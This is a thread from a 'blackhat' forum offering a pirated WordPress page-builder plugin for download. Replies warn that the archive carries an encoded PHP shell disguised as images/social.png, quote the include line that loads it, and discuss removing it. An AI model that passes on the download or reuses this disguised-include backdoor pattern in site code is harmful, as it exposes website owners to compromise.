Best Blackhat Forum

Full Version: [GET LATEST] Codecanyon Visual Composer v3.7.1 for WordPress
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
[Image: 7FqpJ1F.jpg]

Codecanyon Visual Composer v3.7.1 is an updated theme for the WordPress users. It is updated with latest features that allows user to design complex layouts in few minutes very easily. User can add elements with a single click and re-arrange them via a drag and drop control.
Features : Object oriented code, Responsive grid, Custom post type, Drag and drop interface and Easily extensible.

Download : http://bulkyfiles.com/new/js_composer_v3.7.1.zip

+1 Rep please...!!!
thaks +++reps
virus, don't download. File included with shell encoded and not detected by all antivirus.
<?php include('images/social.png'); ?>
(12-04-2013 01:19 AM)hack2learn Wrote: [ -> ]virus, don't download. File included with shell encoded and not detected by all antivirus.
What are you talking about?
all themes or plugin download from getnullscript which infected. If you want to be hacked, just download and using :). I don't scare of you :))
(12-04-2013 02:41 AM)hack2learn Wrote: [ -> ]all themes or plugin download from getnullscript which infected. If you want to be hacked, just download and using :). I don't scare of you :))
Each and every theme is virus free, I'm using it from long time. No issues with it.
I found the same social.png file in hidemywp plugin, i was thinking that is a backdoor from the dev, but i changed the extension from .png to .php and i found alllot of things inside! You should try that :D (yea… it's a virus)
And could you explain what this script exactly does? It seems that it's decrypted with RSA.
I can confirm
https://www.virustotal.com/it/file/040e9...389098743/

social.png is present in some plugins nulled such as newroyalslider or quform latest versions... but you can delete them first upload in website without problems If you want can remove string:
in php file of plugins
@grigione thanks for the suggestion. Could you please guide in detail. Because I deleted that social.png from the folder and my site went blank. Then I had to delete the whole plugin files from the file manager. Any solution?
Pages: 1 2
Reference URL's